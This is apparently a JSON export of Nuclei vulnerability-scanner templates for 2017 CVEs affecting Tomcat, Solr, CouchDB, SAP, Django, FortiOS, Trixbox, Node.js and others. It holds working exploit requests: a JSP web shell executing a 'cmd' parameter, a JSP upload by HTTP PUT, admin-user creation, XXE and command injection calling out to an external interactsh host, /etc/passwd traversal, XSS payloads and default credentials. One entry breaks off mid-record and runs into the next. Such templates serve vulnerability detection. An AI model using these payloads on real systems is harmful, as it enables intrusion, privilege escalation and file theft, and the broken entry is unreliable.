    \");\n Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n OutputStream os = p.getOutputStream();\n InputStream in = p.getInputStream();\n DataInputStream dis = new DataInputStream(in);\n String disr = dis.readLine();\n while ( disr != null ) {\n out.println(disr);\n disr = dis.readLine();\n }\n }\n %>\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n - method: GET\n path:\n - \"{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220379d0c5f5c4e19ce0caab699ea5aa078fc15bd35974269774e64b108806b79be0220532d269649aaacb9e369acb9a5d57da778c6df5d4a0afa2976c71e42e63a865c:922c64590222798bb761d5b6d8e72950", "hash": "98b87e13cb8e8a0e55338ec64065e4c0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fbe" }, "name": "CVE-2017-12617.yaml", "content": "id: CVE-2017-12617\n\ninfo:\n name: Apache Tomcat - Remote Code Execution\n author: pussycat0x\n severity: high\n description: |\n When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. 
This JSP could then be requested and any code it contained would be executed by the server.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected server.\n remediation: |\n Upgrade to Apache Tomcat version 7.0.80 or later to mitigate this vulnerability.\n reference:\n - https://versa-networks.com/blog/apache-tomcat-remote-code-execution-vulnerability-cve-2017-12617/\n - https://github.com/cyberheartmi9/CVE-2017-12617\n - https://www.exploit-db.com/exploits/43008\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12617\n - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: \"CVE-2017-12617\"\n cwe-id: CWE-434\n epss-score: 0.97533\n epss-percentile: 0.99992\n cpe: cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 2\n vendor: apache\n product: tomcat\n shodan-query: html:\"Apache Tomcat\"\n tags: cve2017,cve,tomcat,apache,rce,kev,intrusive\n\nhttp:\n - raw:\n - |\n PUT /{{randstr}}.jsp/ HTTP/1.1\n Host: {{Hostname}}\n\n <% out.println(\"CVE-2017-12617\");%>\n - |\n GET /{{randstr}}.jsp HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"CVE-2017-12617\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206cb00e6b5ee9e566dec0f1232554eaeda4e733f1c1dd46e3373f782288e400b0022062b74144462bbf9d3db2d69023b0aeacde9792aed39f01c1f567d838f5ff8a8e:922c64590222798bb761d5b6d8e72950", "hash": "56fa094a8d8c708dfb7ad5b1d0a35b04", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fbf" }, "name": "CVE-2017-12629.yaml", "content": "id: CVE-2017-12629\n\ninfo:\n name: Apache Solr <= 7.1 - XML Entity Injection\n author: dwisiswant0\n severity: critical\n description: Apache Solr with Apache Lucene before 7.1 is susceptible to remote code 
execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.\n impact: |\n Successful exploitation of this vulnerability could lead to information disclosure, denial of service.\n remediation: |\n Upgrade to a patched version of Apache Solr (7.2 or higher) or apply the recommended security patches.\n reference:\n - https://twitter.com/honoki/status/1298636315613974532\n - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE\n - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12629\n - http://mail-archives.us.apache.org/mod_mbox/www-announce/201710.mbox/%3CCAOOKt51UO_6Vy%3Dj8W%3Dx1pMbLW9VJfZyFWz7pAnXJC_OAdSZubA%40mail.gmail.com%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-12629\n cwe-id: CWE-611\n epss-score: 0.97417\n epss-percentile: 0.99925\n cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: solr\n tags: cve2017,cve,oast,xxe,vulhub,solr,apache\n\nhttp:\n - raw:\n - |\n GET /solr/admin/cores?wt=json HTTP/1.1\n Host: {{Hostname}}\n - |\n GET 
/solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n extractors:\n - type: regex\n name: core\n group: 1\n regex:\n - '\"name\"\\:\"(.*?)\"'\n internal: true\n# digest: 4b0a00483046022100d4ea117d6f8a9a0bca004f0dd6abfb5a07ccac04c694a225786fb4891966d967022100e00d1081ae2657e9248dc91e946a1ff3d4745375c562b0273a375d31b5fe26c6:922c64590222798bb761d5b6d8e72950", "hash": "c11faa7657273f6c90027862ba85775f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc0" }, "name": "CVE-2017-12635.yaml", "content": "id: CVE-2017-12635\n\ninfo:\n name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation\n author: pikpikcu\n severity: critical\n description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users cannot assign themselves roles. 
The vulnerability allows non-admin users to give themselves admin privileges.\n impact: |\n Remote attackers can exploit this vulnerability to escalate privileges.\n remediation: |\n Upgrade Apache CouchDB to version 2.1.1 or later.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12635\n - https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E\n - https://security.gentoo.org/glsa/201711-16\n - https://lists.debian.org/debian-lts-announce/2018/01/msg00026.html\n - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03935en_us\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-12635\n cwe-id: CWE-269\n epss-score: 0.97348\n epss-percentile: 0.99889\n cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: couchdb\n tags: cve2017,cve,couchdb,apache,intrusive\n\nhttp:\n - raw:\n - |\n PUT /_users/org.couchdb.user:poc HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json\n\n {\n \"type\": \"user\",\n \"name\": \"poc\",\n \"roles\": [\"_admin\"],\n \"roles\": [],\n \"password\": \"123456\"\n }\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - application/json\n - \"Location:\"\n\n - type: word\n part: body\n words:\n - org.couchdb.user:poc\n - conflict\n - Document update conflict\n\n - type: status\n status:\n - 201\n - 409\n# digest: 4a0a0047304502203addb2b6e215dbff5fb9d55765b537597f5a37384aa1a41b3cdc23deecc6650a022100a8103420fbf062ce4677bc443e076baa92d8b4301fda6d2729268d370c359b60:922c64590222798bb761d5b6d8e72950", "hash": "c5e17a1e4b73228c8aed0d1f12578240", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc1" }, "name": "CVE-2017-12637.yaml", "content": "id: CVE-2017-12637\n\ninfo:\n name: SAP NetWeaver Application Server Java 7.5 - Local File Inclusion\n author: apt-mirror\n 
severity: high\n description: SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access, data leakage, and potential system compromise.\n remediation: |\n Apply the latest security patches and updates provided by SAP to fix the LFI vulnerability in SAP NetWeaver Application Server Java 7.5.\n reference:\n - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf\n - https://web.archive.org/web/20170807202056/http://www.sh0w.top/index.php/archives/7/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12637\n - http://www.sh0w.top/index.php/archives/7/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-12637\n cwe-id: CWE-22\n epss-score: 0.00648\n epss-percentile: 0.78875\n cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sap\n product: netweaver_application_server_java\n shodan-query: http.favicon.hash:-266008933\n tags: cve2017,cve,sap,lfi,java,traversal\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/..\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"WEB-INF\"\n - \"META-INF\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204718a1f0fc5fb3d6d079a6f410f3203c6081f696613bfb4167a3aedfc56fb25f0221008e2ab021c906aea464f0dacae54694f30f2fa359573d32c35a6dda81f4e2204d:922c64590222798bb761d5b6d8e72950", "hash": "6bcb264d63a025cb810110b5ed428cce", "level": 
5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc2" }, "name": "CVE-2017-12794.yaml", "content": "id: CVE-2017-12794\n\ninfo:\n name: Django Debug Page - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since running with \"DEBUG = True\" is not on by default (which is what makes the page visible).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Django or apply the necessary security patches provided by the Django project.\n reference:\n - https://twitter.com/sec715/status/1406779605055270914\n - https://nvd.nist.gov/vuln/detail/CVE-2017-12794\n - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/\n - http://web.archive.org/web/20211207172022/https://securitytracker.com/id/1039264\n - http://www.securitytracker.com/id/1039264\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-12794\n cwe-id: CWE-79\n epss-score: 0.00219\n epss-percentile: 0.59827\n cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: djangoproject\n product: django\n tags: cve2017,cve,xss,django,djangoproject\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n 
status:\n - 200\n# digest: 490a00463044022045d37d6d95dbcf0d99b3dd98b0548af3f80775282906963e91de53ddd88178e102207fef1b1e81deb1e461760619d1398e0d670d6ad1cb6109983598f16783a68676:922c64590222798bb761d5b6d8e72950", "hash": "d3ce6e41726556b4db6ee4321d9bb8b8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc3" }, "name": "CVE-2017-14135.yaml", "content": "id: CVE-2017-14135\n\ninfo:\n name: OpenDreambox 2.0.0 - Remote Code Execution\n author: alph4byt3\n severity: critical\n description: OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of OpenDreambox.\n reference:\n - https://the-infosec.com/2017/05/12/from-shodan-to-rce-opendreambox-2-0-0-code-execution/\n - https://www.exploit-db.com/exploits/42293\n - https://nvd.nist.gov/vuln/detail/CVE-2017-14135\n - https://the-infosec.com/2017/07/05/from-shodan-to-rce-opendreambox-2-0-0-code-execution/\n - https://github.com/qazbnm456/awesome-cve-poc\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-14135\n cwe-id: CWE-78\n epss-score: 0.96679\n epss-percentile: 0.99625\n cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dreambox\n product: opendreambox\n shodan-query: title:\"Dreambox WebControl\"\n tags: cve,cve2017,dreambox,rce,oast,edb\n\nhttp:\n - raw:\n - |\n GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"/bin/sh\"\n - 
\"/usr/script\"\n condition: and\n\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220698aef45fb765d687383961414979c5887eddf98121aa39048ba6f22392d374802202c71c44bdf2e149840f9cef78912bb4112076d87527c5b8a8744946b59339791:922c64590222798bb761d5b6d8e72950", "hash": "e88e432679d85b6d390f807ee5138f65", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc4" }, "name": "CVE-2017-14186.yaml", "content": "id: CVE-2017-14186\n\ninfo:\n name: FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting\n author: johnk3r\n severity: medium\n description: |\n FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not sanitized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. 
Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or defacement.\n remediation: |\n Apply the latest security patches or firmware updates provided by Fortinet to mitigate this vulnerability.\n reference:\n - https://www.fortiguard.com/psirt/FG-IR-17-242\n - https://fortiguard.com/advisory/FG-IR-17-242\n - https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891\n - https://nvd.nist.gov/vuln/detail/CVE-2017-14186\n - http://www.securitytracker.com/id/1039891\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2017-14186\n cwe-id: CWE-79\n epss-score: 0.02948\n epss-percentile: 0.89847\n cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: fortinet\n product: fortios\n shodan-query: port:10443 http.favicon.hash:945408572\n tags: cve2017,cve,fortigate,xss,fortinet\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'location=decodeURIComponent(\"javascript%3Aalert%28document.domain%29\"'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502207fbfece700e8438f7ceb29e6cb4c1c3db50af2a9118f2a83bd83f1038f9e82d6022100a1093d8d2a97f1f72a728b30504eb3343bb6c5154e62389cc9ab4c4b6c8d3bf6:922c64590222798bb761d5b6d8e72950", "hash": "2b01a99b0f58b0fbd27c60062f435eed", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc5" }, "name": "CVE-2017-14524.yaml", "content": "id: CVE-2017-14524\n\ninfo:\n name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect\n author: 
0x_Akoko\n severity: medium\n description: |\n OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator.\n reference:\n - https://seclists.org/fulldisclosure/2017/Sep/57\n - https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774\n - https://nvd.nist.gov/vuln/detail/CVE-2017-14524\n - http://seclists.org/fulldisclosure/2017/Sep/57\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-14524\n cwe-id: CWE-601\n epss-score: 0.00258\n epss-percentile: 0.6357\n cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: opentext\n product: documentum_administrator\n tags: cve2017,cve,redirect,opentext,seclists\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$'\n# digest: 4b0a00483046022100b32892e1ac671729ba982d52eb2d13b0e91ddae6c90c6b945a64e664d066cdb9022100eb9538968f1f58b108976f27fc2fa9ed8990673db1a2e1e1611c8fa3cfb12b8a:922c64590222798bb761d5b6d8e72950", "hash": "d51a991278ab885b2f11c70dc9885687", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc6" }, "name": "CVE-2017-14535.yaml", "content": "id: CVE-2017-14535\n\ninfo:\n name: Trixbox - 2.8.0.4 OS Command Injection\n author: pikpikcu\n severity: high\n 
description: |\n Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php. The /maint interface sits behind HTTP Basic authentication (CVSS PR:L); this template authenticates with the default maint:password credentials, so a non-match on a host whose credentials were changed does not show that the host is patched.
"$oid": "66477a413521042ccf307fc7" }, "name": "CVE-2017-14537.yaml", "content": "id: CVE-2017-14537\n\ninfo:\n name: Trixbox 2.8.0 - Path Traversal\n author: pikpikcu\n severity: medium\n description: Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of Trixbox to mitigate this vulnerability.\n reference:\n - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-14537\n - https://sourceforge.net/projects/asteriskathome/\n - http://packetstormsecurity.com/files/162853/Trixbox-2.8.0.4-Path-Traversal.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2017-14537\n cwe-id: CWE-22\n epss-score: 0.01002\n epss-percentile: 0.81968\n cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: netfortris\n product: trixbox\n tags: cve,cve2017,trixbox,lfi,packetstorm,netfortris\n\nhttp:\n - raw:\n - |\n POST /maint/index.php?packages HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Referer: {{Hostname}}/maint/index.php?packages\n Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\n Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n\n xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages\n - |\n GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1\n Host: {{Hostname}}\n Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Referer: {{Hostname}}/maint/index.php?packages\n Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\n Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100dfdc6074c62d2b9fa504221e526fa86d4918ccb5fa03a6d416b7c3e3db979398022100befa0ade8449e62b774fab5bf32a5397402c437966bb993ac5f882d24bedab9d:922c64590222798bb761d5b6d8e72950", "hash": "5c674d7b9516a12177c020a669bd5b1a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc8" }, "name": "CVE-2017-14622.yaml", "content": "id: CVE-2017-14622\n\ninfo:\n name: WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress 2kb Amazon Affiliates Store plugin before 2.1.1 contains multiple cross-site scripting vulnerabilities. 
The plugin allows an attacker to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php, thus making possible theft of cookie-based authentication credentials and launch of other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Update the WordPress 2kb Amazon Affiliates Store plugin to version 2.1.1 or later to mitigate the vulnerability.\n reference:\n - https://packetstormsecurity.com/files/144261/WordPress-2kb-Amazon-Affiliates-Store-2.1.0-Cross-Site-Scripting.html\n - https://wordpress.org/plugins/2kb-amazon-affiliates-store/#developers\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14622\n - https://nvd.nist.gov/vuln/detail/CVE-2017-14622\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-14622\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.47816\n cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: 2kblater\n product: 2kb_amazon_affiliates_store\n framework: wordpress\n tags: cve2017,cve,xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm,2kblater\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\n Host: {{Hostname}}\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 500'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, 
\"2kb-amazon-affiliates-store\")'\n condition: and\n# digest: 4b0a00483046022100df3637896184e2aa1264d2f8525ee71b55512c568590dccf0a39b3fac376f08002210095e59997264b698ff5ffe471f30c28dd486358c7dcbf06fb0bf4b2265c129718:922c64590222798bb761d5b6d8e72950", "hash": "7eb93ca6063444a0b224b8dd2448cdba", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fc9" }, "name": "CVE-2017-14651.yaml", "content": "id: CVE-2017-14651\n\ninfo:\n name: WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting\n author: mass0ma\n severity: medium\n description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of WSO2 Data Analytics Server or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/cybersecurityworks/Disclosed/issues/15\n - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265\n - https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-14651\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2017-14651\n cwe-id: CWE-79\n epss-score: 0.00144\n epss-percentile: 0.49339\n cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wso2\n product: api_manager\n tags: cve,cve2017,wso2,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E\"\n\n 
matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"Failed to add new collection\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n# digest: 4a0a00473045022034f84ef006638a070852b350742ad77cd35f09148d0fbf4414429225a72f02e1022100c0814184d527fbae67d23da2ebd61e4645fa2c28e29bff5142f47a551b927bcf:922c64590222798bb761d5b6d8e72950", "hash": "3aea62a64bad1354aa531a64ecd08476", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fca" }, "name": "CVE-2017-14849.yaml", "content": "id: CVE-2017-14849\n\ninfo:\n name: Node.js <8.6.0 - Directory Traversal\n author: Random_Robbie\n severity: high\n description: Node.js before 8.6.0 allows remote attackers to access unintended files because a change to \"..\" handling is incompatible with the pathname validation used by unspecified community modules.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade Node.js to version 8.6.0 or higher to mitigate the vulnerability.\n reference:\n - https://twitter.com/nodejs/status/913131152868876288\n - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-14849\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-14849\n cwe-id: CWE-22\n epss-score: 0.96684\n epss-percentile: 0.99566\n cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: nodejs\n product: node.js\n tags: cve2017,cve,nodejs,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/static/../../../a/../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
